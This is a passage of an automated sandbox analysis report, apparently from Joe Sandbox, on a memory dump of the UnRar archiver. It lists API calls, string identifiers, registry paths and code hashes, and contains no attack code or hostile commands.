                                                            Total number of Limit Nodes:6

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$LibraryQueryValue$CloseFreeLoadOpenVersion
                                                            • String ID: LanguageFolder$LanguageFolder$Software\WinRAR\General$rarlng.dll
                                                            • API String ID: 1380314429-3582364644
                                                            • Opcode ID: 0bf37d04180593c3d6e5092dbfd08b06593bdd7d5482d25904280f249be3a38c
                                                            • Instruction ID: 0622a125725848cb09c14bb3a2b9aca846f48f8d888df2ced59808bd04bbb641
                                                            • Opcode Fuzzy Hash: 0bf37d04180593c3d6e5092dbfd08b06593bdd7d5482d25904280f249be3a38c
                                                            • Instruction Fuzzy Hash: 2DB1BE72B1AB42D5FB10EB64E4402ADA371FB88794F814271DAAD13BA9DF3CD546C320
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: $ ?$%s%s $__tmp_reference_source_
                                                            • API String ID: 3668304517-1166188083
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                            • String ID: *.*
                                                            • API String ID: 3587649625-438819550
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: rar$rev
                                                            • API String ID: 3668304517-2145959568

                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: rev
                                                            • API String ID: 3668304517-165162695

                                                            • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                            • String ID:
                                                            • API String ID: 474548282-0
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: CMT
                                                            • API String ID: 3668304517-2756464174
                                                            Similarity
                                                            • API ID: CreateErrorFileLast_invalid_parameter_noinfo_noreturn$Char
                                                            • String ID:
                                                            • API String ID: 3265667968-0
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID:
                                                            • API String ID: 3340455307-0

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                            • String ID: *?.$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tbz;tbz2;tgz;txz;xz;z;zip;zipx;zst;tzst$EML$ERR$FG-$LOG$NUL$OFF$SND$VER$rar.ini$rar.log$stdin$stdin$switches=$switches_%ls=
                                                            • API String ID: 449872665-88337483
                                                            • Opcode ID: 6267e444c41d9af39348556cdd25e3d021dd02c7d207ce1d0e9719f748284b90
                                                            • Instruction ID: 5f243489a3db840a266ecec5cf3c81d8e3fc0ef71d86d6c8ee839fe12d65bd35
                                                            • Opcode Fuzzy Hash: 6267e444c41d9af39348556cdd25e3d021dd02c7d207ce1d0e9719f748284b90
                                                            • Instruction Fuzzy Hash: FB91C462A0A782C1FE10FB25E4401ADE361FF557A0F811275EAAD17AE9EF3DD546C320
                                                            APIs
                                                              • Part of subcall function 00007FF7AACD97B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7AACD98F0
                                                            • snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7AACDA766
                                                              • Part of subcall function 00007FF7AACE4F58: WideCharToMultiByte.KERNEL32 ref: 00007FF7AACE4F89
                                                              • Part of subcall function 00007FF7AACFA08C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACFA0CC
                                                              • Part of subcall function 00007FF7AACD961C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7AACD97A7
                                                              • Part of subcall function 00007FF7AACFA260: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACFA29D
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACDAC1B
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACDAC21
                                                              • Part of subcall function 00007FF7AACE4908: MultiByteToWideChar.KERNEL32 ref: 00007FF7AACE4935
                                                            Strings
                                                            Similarity
                                                            • API ID: ByteCharConcurrency::cancel_current_taskMultiWide_invalid_parameter_noinfo_invalid_parameter_noinfo_noreturn$snprintf
                                                            • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                            • API String ID: 3396569959-2291855099
                                                            • Opcode ID: c13a5eb0a00e232bccc1263437655337805f9f9e7171794635d9ad1c305fde2f
                                                            • Instruction ID: 60aa7e5c90fd644ea872a0ceaec3d7b3aca64aef2c7924ee7020f6a577295d3b
                                                            • Opcode Fuzzy Hash: c13a5eb0a00e232bccc1263437655337805f9f9e7171794635d9ad1c305fde2f
                                                            • Instruction Fuzzy Hash: D6629D22A1BA42D5FB20EB24D4542BDA361FB40B84FC25172DA5E476A9EF3CE546C360
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                            • String ID: *.*$\\?\
                                                            • API String ID: 3587649625-3726515343
                                                            • Opcode ID: b0c5c0b6c3d2827f39fd2328d0fed0b2c68d2d861323d812b7d1a0e61af7cb86
                                                            • Instruction ID: 6fc6f2c8565b769c7bd62dfd8789e0cad76c936c4965ac52a41290d976e469b7
                                                            • Opcode Fuzzy Hash: b0c5c0b6c3d2827f39fd2328d0fed0b2c68d2d861323d812b7d1a0e61af7cb86
                                                            • Instruction Fuzzy Hash: E6D1D426F0B642D6FA21EB25D0543BEA761EB44788F864576DE5E036A6DF3CE442C320

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: .part$.rar$.rar$AFUMD$FUADPXETK
                                                            • API String ID: 3668304517-2058463528
                                                            • Opcode ID: 2d39152e319951bd1ce4e438e6835127e6fa2b428a3d4c3c04c044c153d60f78
                                                            • Instruction ID: 2a418feb21c517f50182ac588fba59650b9de5c7bfdbe1844c7c9d339a93577a
                                                            • Opcode Fuzzy Hash: 2d39152e319951bd1ce4e438e6835127e6fa2b428a3d4c3c04c044c153d60f78
                                                            • Instruction Fuzzy Hash: ACC1B262A1A782D2FA10BB25D4401BCA361FF41B94F825171DAAD07AF9DF3DE556C320

                                                            Control-flow Graph

                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00001000,00007FF7AACD0E37), ref: 00007FF7AACD229D
                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00001000,00007FF7AACD0E37), ref: 00007FF7AACD22CA
                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00001000,00007FF7AACD0E37), ref: 00007FF7AACD2317
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00001000,00007FF7AACD0E37), ref: 00007FF7AACD233B
                                                            Strings
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID: AppData$AppData$Software\WinRAR\Paths
                                                            • API String ID: 1586453840-1988337141
                                                            • Opcode ID: ed497a8cbe7806ce1d9b93360197fb11ffa709cb20c2f162745bbb1ca0ccaf8d
                                                            • Instruction ID: 12e2dd0eb3f4775ec6edf909b4ee0076b1eeb75521e114dcea9bb5cb070dc45f
                                                            • Opcode Fuzzy Hash: ed497a8cbe7806ce1d9b93360197fb11ffa709cb20c2f162745bbb1ca0ccaf8d
                                                            • Instruction Fuzzy Hash: 9E51B432B16B52C5FB10EB64E8406ADB364FB44B94F815271EE6D13BA9DF38E582C310

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                            • API String ID: 1389829785-2207617598
                                                            • Opcode ID: 7ba5d648b7a9a9b8108ee14ce5cf243dd11fc7691fcb84308df272f33f3c63ba
                                                            • Instruction ID: dd5619c6f89fe9c19fb9e9ae021963542e275c5d3a9ba7916c5b613e4e6b51da
                                                            • Opcode Fuzzy Hash: 7ba5d648b7a9a9b8108ee14ce5cf243dd11fc7691fcb84308df272f33f3c63ba
                                                            • Instruction Fuzzy Hash: 69310F20A0BB42C5FA14AF15A950279A750FF44B90F9605B5C8AE477BCEE3CE44AC360

                                                            Control-flow Graph

                                                            APIs
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3536497005-0
                                                            • Opcode ID: b28dfd38d1f5603dbe78f85ab0ac22f650973a25cfc8560123047e12e41c51ce
                                                            • Instruction ID: a202a7db1d0875ff6d32450d4b562f00a4b195c80acd53dab1240920703924e6
                                                            • Opcode Fuzzy Hash: b28dfd38d1f5603dbe78f85ab0ac22f650973a25cfc8560123047e12e41c51ce
                                                            • Instruction Fuzzy Hash: 0261E362A09781C5F7209F29E40436EA7A2F785BA8F511334DFAE03AE8DF3DD4568714

                                                            Control-flow Graph

                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleWrite
                                                            • String ID:
                                                            • API String ID: 1958782092-0
                                                            • Opcode ID: 9feef63f2c338450b48a7252146bb4e81200e32049827446f7bcbae2c6bac33c
                                                            • Instruction ID: 133654fbe9c4d48b9fbc724d63597c7c5849833bf7fd696fe0663bdf668e7c85
                                                            • Opcode Fuzzy Hash: 9feef63f2c338450b48a7252146bb4e81200e32049827446f7bcbae2c6bac33c
                                                            • Instruction Fuzzy Hash: 6051B862A1A642C2FA60AF25E40467EE361FB44FD0F861171DA9E53AB4DF3CD542C710

                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 4014116897-0
                                                            • Opcode ID: 83b7ec5f64b5b9070ae5e424fdc024dca84094503441953cd71ead5b1cc84582
                                                            • Instruction ID: e335cb40ac498a69c55d83c5d73cebd954b01649bf44444db482fc4617162b8c
                                                            • Opcode Fuzzy Hash: 83b7ec5f64b5b9070ae5e424fdc024dca84094503441953cd71ead5b1cc84582
                                                            • Instruction Fuzzy Hash: 8A51B163F16B42D5FF10EBB4D4542BCA321EB947A4B815371EE6D22AE9EE38D446C310

                                                            APIs
                                                              • Part of subcall function 00007FF7AACE2648: GetModuleHandleW.KERNEL32(?,?,?,00007FF7AACD4BC6), ref: 00007FF7AACE265C
                                                              • Part of subcall function 00007FF7AACE2648: GetProcAddress.KERNEL32(?,?,?,00007FF7AACD4BC6), ref: 00007FF7AACE2674
                                                              • Part of subcall function 00007FF7AACE2648: GetProcAddress.KERNEL32(?,?,?,00007FF7AACD4BC6), ref: 00007FF7AACE269F
                                                            • SetErrorMode.KERNELBASE ref: 00007FF7AACD4BDE
                                                            • GetModuleHandleW.KERNEL32 ref: 00007FF7AACD4BE6
                                                              • Part of subcall function 00007FF7AACDB230: GetVersionExW.KERNEL32 ref: 00007FF7AACDB311
                                                              • Part of subcall function 00007FF7AACDB230: LoadLibraryExW.KERNELBASE ref: 00007FF7AACDB344
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACD4D9F
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion_invalid_parameter_noinfo_noreturn
                                                            • String ID: rar.lng
                                                            • API String ID: 2496962413-2410228151
                                                            • Opcode ID: 9177278a2134e7d21367c49a1326082cdd6f4549e7a8adf39d74ed32eade6c2d
                                                            • Instruction ID: 1af010fb9488fb1321cf126c4ec45240e5e61372d94b4ebf6a2b312d68a2a54f
                                                            • Opcode Fuzzy Hash: 9177278a2134e7d21367c49a1326082cdd6f4549e7a8adf39d74ed32eade6c2d
                                                            • Instruction Fuzzy Hash: FA51B021A1B742C2FA14BB21E41037DE350EF95B84F9611B5EA9D077FADE2DE442C720

                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: c02d44e9d936ff1de122f90b0d65e1120e6c6839826f6b2cd92f2c34210acf56
                                                            • Instruction ID: 7b9a7c0eff724aff4a51a4d8d6cd259eeeae8ee6979712b763bfefd9eefd8415
                                                            • Opcode Fuzzy Hash: c02d44e9d936ff1de122f90b0d65e1120e6c6839826f6b2cd92f2c34210acf56
                                                            • Instruction Fuzzy Hash: C721C821A0A951C5FB70AF11E400239F350FB55B94F9551B8DA6D47BB4CF3ED8428720

                                                            APIs
                                                              • Part of subcall function 00007FF7AACE2DA8: ResetEvent.KERNEL32 ref: 00007FF7AACE2DC1
                                                              • Part of subcall function 00007FF7AACE2DA8: ReleaseSemaphore.KERNEL32 ref: 00007FF7AACE2DD7
                                                            • ReleaseSemaphore.KERNEL32 ref: 00007FF7AACE2A40
                                                            • CloseHandle.KERNELBASE ref: 00007FF7AACE2A5F
                                                            • DeleteCriticalSection.KERNEL32 ref: 00007FF7AACE2A76
                                                            • CloseHandle.KERNEL32 ref: 00007FF7AACE2A83
                                                              • Part of subcall function 00007FF7AACE2B28: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AACE2A2B,?,?,?,00007FF7AACCD44A,?,?,?), ref: 00007FF7AACE2B2F
                                                              • Part of subcall function 00007FF7AACE2B28: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AACE2A2B,?,?,?,00007FF7AACCD44A,?,?,?), ref: 00007FF7AACE2B3A
                                                            Similarity
                                                            • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 502429940-0
                                                            • Opcode ID: 2b165e8ad557bec0e473843de1c9952da14d40c3bc3872041f111a27311d0279
                                                            • Instruction ID: b4dd777d1c6d7129c3e04b1382927dfaf97b24e29620c5872e1e5051df8100f5
                                                            • Opcode Fuzzy Hash: 2b165e8ad557bec0e473843de1c9952da14d40c3bc3872041f111a27311d0279
                                                            • Instruction Fuzzy Hash: E0014033A15E81D2F658AB21E54466DB320FB88B80F414171DBAE53625CF38E4B2C750

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Library$FreeLoadVersion_invalid_parameter_noinfo_noreturn
                                                            • String ID: rarlng.dll
                                                            • API String ID: 2688500320-1675521814
                                                            • Opcode ID: 0ad8de6bebfdfd1964e1752b41a765ccf109df7457987d996abce62f4454f237
                                                            • Instruction ID: d7c01215b5535646248aba05cd2279187f9f6364279557292cc98bb53e98f6d7
                                                            • Opcode Fuzzy Hash: 0ad8de6bebfdfd1964e1752b41a765ccf109df7457987d996abce62f4454f237
                                                            • Instruction Fuzzy Hash: 9941A332A1AB85C2FB10EB15E44026EB364FB89790F914275EADD43BA9DF3CD546CB10

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID: @
                                                            • API String ID: 3000768030-2766056989
                                                            • Opcode ID: f3e7264861a9ac29b6bc2686cda94d827727d6c0fc44cd82d1f241d9f40e9471
                                                            • Instruction ID: ad019f7028fb47344812c6eaf9dcc1acd9949371c930669001962e5e8c5570a2
                                                            • Opcode Fuzzy Hash: f3e7264861a9ac29b6bc2686cda94d827727d6c0fc44cd82d1f241d9f40e9471
                                                            • Instruction Fuzzy Hash: BF21A423A19743C0FB645B2D94A413CA650EB85774B6A1375DAAE067E4CF38D486E314
                                                            APIs
                                                            • SHGetMalloc.SHELL32(?,00000000,?,00007FF7AACD239F), ref: 00007FF7AACD194F
                                                            • SHGetSpecialFolderLocation.SHELL32(?,00007FF7AACD239F,?,?,?,?,?,?,?,?,?,?,?,?,00001000,00007FF7AACD0E37), ref: 00007FF7AACD197A
                                                            Strings
                                                            Similarity
                                                            • API ID: FolderLocationMallocSpecial
                                                            • String ID: WinRAR
                                                            • API String ID: 531188275-3970807970
                                                            • Opcode ID: f3af807f95675379bdc82ed4cd9a2cf9e3fc9a091f5582759017ac9cfa60aa1b
                                                            • Instruction ID: 46315f264a92a15b249ba26e698edcf3a3d1e5e6295517be4ea6b7badb8e3fd9
                                                            • Opcode Fuzzy Hash: f3af807f95675379bdc82ed4cd9a2cf9e3fc9a091f5582759017ac9cfa60aa1b
                                                            • Instruction Fuzzy Hash: 86116D2660AB46C5FF14AF26E4441B9A360EB86B98F861072EF4E477A5CF3CD446C720
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: LoadString$fflushswprintf
                                                            • String ID: %d.%02d$AFUM
                                                            • API String ID: 1946543793-129172010
                                                            • Opcode ID: 18d0168ece5d6b75b683f51e54f7397ceaa9557a8b843644d4e337b63a1198d7
                                                            • Instruction ID: ea6c2dccdb363d795f8d42c5c135781d75ec013deedb1de534b9b39652779b9c
                                                            • Opcode Fuzzy Hash: 18d0168ece5d6b75b683f51e54f7397ceaa9557a8b843644d4e337b63a1198d7
                                                            • Instruction Fuzzy Hash: 0C21C821A1E386D5FB60B724E0503BEB350EF84744F8510B6E58E07AAACF2DE147C760
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Thread$CreatePriority
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2610526550-3849766595
                                                            APIs
                                                            Similarity
                                                            • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2272807158-0
                                                            APIs
                                                            Similarity
                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 3058843127-0
                                                            APIs
                                                            Similarity
                                                            • API ID: std::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 1875163511-0
                                                            APIs
                                                            Similarity
                                                            • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 1203560049-0
                                                            APIs
                                                            Similarity
                                                            • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 1203560049-0
                                                            APIs
                                                            • GetStdHandle.KERNEL32(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC16
                                                            • GetFileType.KERNELBASE(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC22
                                                            • GetConsoleMode.KERNELBASE(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC35
                                                            Similarity
                                                            • API ID: ConsoleFileHandleModeType
                                                            • String ID:
                                                            • API String ID: 4141822043-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: R
                                                            • API String ID: 3668304517-1466425173
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CommandLine
                                                            • String ID: AFUM
                                                            • API String ID: 3253501508-3109717258
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000,?,00007FF7AACCA5DE,?,?,?,00007FF7AACD47A7), ref: 00007FF7AACCA3D9
                                                            • GetLastError.KERNEL32(?,00007FF7AACCA5DE,?,?,?,00007FF7AACD47A7), ref: 00007FF7AACCA3E8
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            APIs
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            APIs
                                                            Similarity
                                                            • API ID: FromListPath_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2469645512-0
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            APIs
                                                            • setbuf.LIBCMT ref: 00007FF7AACBDB73
                                                              • Part of subcall function 00007FF7AACF9CE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACFF217
                                                            • setbuf.LIBCMT ref: 00007FF7AACBDB87
                                                              • Part of subcall function 00007FF7AACBDC10: GetStdHandle.KERNEL32(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC16
                                                              • Part of subcall function 00007FF7AACBDC10: GetFileType.KERNELBASE(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC22
                                                              • Part of subcall function 00007FF7AACBDC10: GetConsoleMode.KERNELBASE(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC35
                                                              • Part of subcall function 00007FF7AACF9CBC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACF9CD0
                                                              • Part of subcall function 00007FF7AACF9D40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACF9E1C
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                            • String ID:
                                                            • API String ID: 4044681568-0
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7AACE2C79,?,?,?,?,00007FF7AACD02DA,?,?,00000000,00007FF7AACD0272), ref: 00007FF7AACE2C28
                                                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF7AACE2C3B
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 1173176844-0
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 485612231-0
                                                            APIs
                                                              • Part of subcall function 00007FF7AACE2A14: ReleaseSemaphore.KERNEL32 ref: 00007FF7AACE2A40
                                                              • Part of subcall function 00007FF7AACE2A14: CloseHandle.KERNELBASE ref: 00007FF7AACE2A5F
                                                              • Part of subcall function 00007FF7AACE2A14: DeleteCriticalSection.KERNEL32 ref: 00007FF7AACE2A76
                                                              • Part of subcall function 00007FF7AACE2A14: CloseHandle.KERNEL32 ref: 00007FF7AACE2A83
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACE5AC2
                                                            Similarity
                                                            • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 904680172-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task
                                                            • String ID:
                                                            • API String ID: 118556049-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            APIs
                                                            Similarity
                                                            • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 1011579015-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            APIs
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            APIs
                                                              • Part of subcall function 00007FF7AACDAFB4: RegOpenKeyExW.ADVAPI32 ref: 00007FF7AACDB034
                                                              • Part of subcall function 00007FF7AACDAFB4: RegQueryValueExW.ADVAPI32 ref: 00007FF7AACDB061
                                                              • Part of subcall function 00007FF7AACDAFB4: RegQueryValueExW.ADVAPI32 ref: 00007FF7AACDB0C5
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACDA0F5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: QueryValue$Open_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2552172544-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            APIs
                                                            • fflush.LIBCMT ref: 00007FF7AACBE45F
                                                              • Part of subcall function 00007FF7AACBE0C0: GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACBE48C), ref: 00007FF7AACBDF59
                                                              • Part of subcall function 00007FF7AACBE0C0: WriteFile.KERNEL32 ref: 00007FF7AACBDF8F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: FileHandleWritefflush
                                                            • String ID:
                                                            • API String ID: 552385020-0
                                                            APIs
                                                            • fflush.LIBCMT ref: 00007FF7AACBE0EE
                                                              • Part of subcall function 00007FF7AACBE0C0: GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACBE48C), ref: 00007FF7AACBDF59
                                                              • Part of subcall function 00007FF7AACBE0C0: WriteFile.KERNEL32 ref: 00007FF7AACBDF8F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: FileHandleWritefflush
                                                            • String ID:
                                                            • API String ID: 552385020-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: File
